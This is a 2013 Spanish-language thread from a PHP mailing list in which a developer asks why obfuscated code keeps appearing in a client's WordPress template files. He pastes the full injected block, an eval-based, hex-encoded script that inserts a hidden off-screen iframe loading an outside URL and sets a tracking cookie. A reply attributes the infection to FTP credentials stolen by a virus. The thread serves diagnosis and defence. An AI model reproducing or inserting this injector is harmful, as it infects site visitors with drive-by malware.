[Php-avanzado] Ayuda codigo malicioso Js
Juan Manuel P.
tucu_21 en hotmail.com
Jue Ago 15 18:25:31 ART 2013
Este es el codigo que me copia en todos los archivos, ahora tambien lo encontre en algunos archivos htm, html o index.php
#0f2490#
if(empty($id)) {
$id = "<script type=\"text/javascript\" language=\"javascript\" >z=\"y\";vz=\"d\"+\"oc\"+\"ument\";ps=\"s\"+\"plit\";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff=\"fr\"+\"omCh\"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v=\"0x\";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)[\"\x62od\"+z]}catch(q){a2=\"_\";}z=\"2d_73_82_7b_70_81_76_7c_7b_2d_86_7c_85_71_81_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_17_2d_83_6e_7f_2d_86_7c_85_71_81_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7f_72_6e_81_72_52_79_72_7a_72_7b_81_35_34_76_73_7f_6e_7a_72_34_36_48_1a_17_1a_17_2d_86_7c_85_71_81_3b_80_7f_70_2d_4a_2d_34_75_81_81_7d_47_3c_3c_75_6f_78_7c_7f_7d_80_3b_80_70_75_72_76_7f_7c_3b_71_72_3c_5f_59_74_66_4f_85_65_41_3b_7d_75_7d_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_7d_7c_80_76_81_76_7c_7b_2d_4a_2d_34_6e_6f_80_7c_79_82_81_72_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_70_7c_79_7c_7f_2d_4a_2d_34_45_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_75_72_76_74_75_81_2d_4a_2d_34_45_7d_85_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_84_76_71_81_75_2d_4a_2d_34_45_7d_85_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_79_72_73_81_2d_4a_2d_34_3e_3d_3d_3d_45_34_48_1a_17_2d_86_7c_85_71_81_3b_80_81_86_79_72_3b_81_7c_7d_2d_4a_2d_34_3e_3d_3d_3d_45_34_48_1a_17_1a_17_2d_76_73_2d_35_2e_71_7c_70_82_7a_72_7b_81_3b_74_72_81_52_79_72_7a_72_7b_81_4f_86_56_71_35_34_86_7c_85_71_81_34_36_36_2d_88_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_84_7f_76_81_72_35_34_49_7d_2d_76_71_4a_69_34_86_7c_85_71_81_69_34_2d_70_79_6e_80_80_4a_69_34_86_7c_85_71_81_3d_46_69_34_2d_4b_49_3c_7d_4b_34_36_48_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_74_72_81_52_79_72_7a_72_7b_81_4f_86_56_71_35_34_86_7c_85_71_81_34_36_3b_6e_7d_7d_72_7b_71_50_75_76_79_71_35_86_7c_85_71_81_36_48_1a_17_2d_8a_1a_17_8a_1a_17_73_82_7b_70_81_76_7c_7b_2d_60_72_81_50_7c_7c_78_76_72_35_70_7c_7c_78_76_72_5b_6e_7a_72_39_70_7c_7c_78_76_72_63_6e_79_82_72_39_7b_51_6e_86_80_39_7d_6e_81_75_36_2d_88_1a_17_2d_83_6e_7f_2d_81_7c_71_6e_86_2d_4a_2d_7b_72_84_2d_51_6e_81_72_35_36_48_1a_17_2d_83_6e_7f_2d_72_85_7d_76_7f_72_2d_4a_2d_7b_72_84_2d_51_6e_81_72_35_36_48_1a_17_2d_76_73_2d_35_7b_51_6e_86_80_4a_4a_7b_82_79_79_2d_89_89_2d_7b_51_6e_86_80_4a_4a_3d_36_2d_7b_51_6e_86_80_4a_3e_48_1a_17_2d_72_85_7d_76_7f_72_3b_80_72_81_61_76_7a_72_35_81_7c_71_6e_86_3b_74_72_81_61_76_7a_72_35_36_2d_38_2d_40_43_3d_3d_3d_3d_3d_37_3f_41_37_7b_51_6e_86_80_36_48_1a_17_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_2d_4a_2d_70_7c_7c_78_76_72_5b_6e_7a_72_38_2f_4a_2f_38_72_80_70_6e_7d_72_35_70_7c_7c_78_76_72_63_6e_79_82_72_36_1a_17_2d_38_2d_2f_48_72_85_7d_76_7f_72_80_4a_2f_2d_38_2d_72_85_7d_76_7f_72_3b_81_7c_54_5a_61_60_81_7f_76_7b_74_35_36_2d_38_2d_35_35_7d_6e_81_75_36_2d_4c_2d_2f_48_2d_7d_6e_81_75_4a_2f_2d_38_2d_7d_6e_81_75_2d_47_2d_2f_2f_36_48_1a_17_8a_1a_17_73_82_7b_70_81_76_7c_7b_2d_54_72_81_50_7c_7c_78_76_72_35_2d_7b_6e_7a_72_2d_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_7f_81_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_76_7b_71_72_85_5c_73_35_2d_7b_6e_7a_72_2d_38_2d_2f_4a_2f_2d_36_48_1a_17_2d_83_6e_7f_2d_79_72_7b_2d_4a_2d_80_81_6e_7f_81_2d_38_2d_7b_6e_7a_72_3b_79_72_7b_74_81_75_2d_38_2d_3e_48_1a_17_2d_76_73_2d_35_2d_35_2d_2e_80_81_6e_7f_81_2d_36_2d_33_33_1a_17_2d_35_2d_7b_6e_7a_72_2d_2e_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_80_82_6f_80_81_7f_76_7b_74_35_2d_3d_39_2d_7b_6e_7a_72_3b_79_72_7b_74_81_75_2d_36_2d_36_2d_36_1a_17_2d_88_1a_17_2d_7f_72_81_82_7f_7b_2d_7b_82_79_79_48_1a_17_2d_8a_1a_17_2d_76_73_2d_35_2d_80_81_6e_7f_81_2d_4a_4a_2d_3a_3e_2d_36_2d_7f_72_81_82_7f_7b_2d_7b_82_79_79_48_1a_17_2d_83_6e_7f_2d_72_7b_71_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_76_7b_71_72_85_5c_73_35_2d_2f_48_2f_39_2d_79_72_7b_2d_36_48_1a_17_2d_76_73_2d_35_2d_72_7b_71_2d_4a_4a_2d_3a_3e_2d_36_2d_72_7b_71_2d_4a_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_79_72_7b_74_81_75_48_1a_17_2d_7f_72_81_82_7f_7b_2d_82_7b_72_80_70_6e_7d_72_35_2d_71_7c_70_82_7a_72_7b_81_3b_70_7c_7c_78_76_72_3b_80_82_6f_80_81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_86_7c_85_71_81_3d_46_35_36_48_1a_17_8a_1a_17_8a\"[ps](a2);za=\"\";aa(\"arCode\");e(\"\"+za);}</script>";
echo $id;
}
#/0f2490#
Piñeiro, Juan Manuel
Aliweb - Desarrollo de Software
Cel (0223) 155 704568
Web www.aliweb.com.ar
Mar del Plata | Argentina
> From: leonardot en pegasusnet.com.ar
> To: php-avanzado en pato2.fi.mdp.edu.ar
> Date: Thu, 15 Aug 2013 16:27:12 -0300
> Subject: Re: [Php-avanzado] Ayuda codigo malicioso Js
>
> Hola Juan Manuel,
>
> esto es típico de cuando alguien que tiene configurado en su PC un
> cliente FTP con la clave del sitio tiene un virus.
> El virus se conecta vía FTP y modifica los scripts.
>
>
> PD: la lista no tiene ninguna restricción de contenido y podés enviar
> por acá el código malicioso. La única restricción es del tamaño del
> mail. Te da algún error?
>
>
> El jue, 15-08-2013 a las 00:59 -0300, Juan Manuel P. escribió:
> > Buenas noches, quisiera hacer una consulta a la lista, para saber si
> > alguien tiene alguna idea de donde puede provenir el problema.
> >
> > Tengo un cliente que tiene su sitio en wordpress, ya lo tenia cuando
> > lo contacte y quizo seguir con esta plataforma, por lo que le
> > desarrolle una plantilla (en una primera etapa de la pagina principal,
> > estamos con una segunda etapa de la vista interna del sitio).
> >
> > El problema me esta sucediendo desde hace una semana es que no
> > entiendo como es que de repente se agrega codigo malicioso (codigo
> > javascript que los antivirus lo detectan como virus), y aclaro que de
> > repente porque de la nada he visto agregado codigo en el archivo
> > header.php y he visto como se borra codigo que yo mismo habia escrito
> > en ese archivo.
> >
> > Hoy, a diferencia de la semana pasada, me encontre con una marca que
> > me sorprendio y la google pero no encontre la fuente del problema.
> >
> > No dejo el codigo que se inserta en cada uno de estos archivos (porque
> > se copia en cada una de los archivos header.php de TODAS las
> > plantillas instaladas) porque la lista no me permite pero empieza con
> > esta etiqueta #0f2490# el marcado de donde inicia y donde termina.
> >
> > Piñeiro, Juan Manuel
> > Aliweb - Desarrollo de Software
> > Cel (0223) 155 704568
> > Web www.aliweb.com.ar
> > Mar del Plata | Argentina
> > _______________________________________________
> > Php-avanzado mailing list
> > Php-avanzado en pato2.fi.mdp.edu.ar
> > http://www3.fi.mdp.edu.ar/cgi-bin/mailman/listinfo/php-avanzado
>
> --
> Leonardo Tadei
> leonardot en pegasusnet.com.ar
> Web: http://leonardo.tadei.com.ar
> Firma pública: http://www.pegasusnet.com.ar/LeonardoTadei-public.key
>
> _______________________________________________
> Php-avanzado mailing list
> Php-avanzado en pato2.fi.mdp.edu.ar
> http://www3.fi.mdp.edu.ar/cgi-bin/mailman/listinfo/php-avanzado
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL: <http://www3.fi.mdp.edu.ar/pipermail/php-avanzado/attachments/20130815/702c26b9/attachment-0001.html>
Más información sobre la lista de distribución Php-avanzado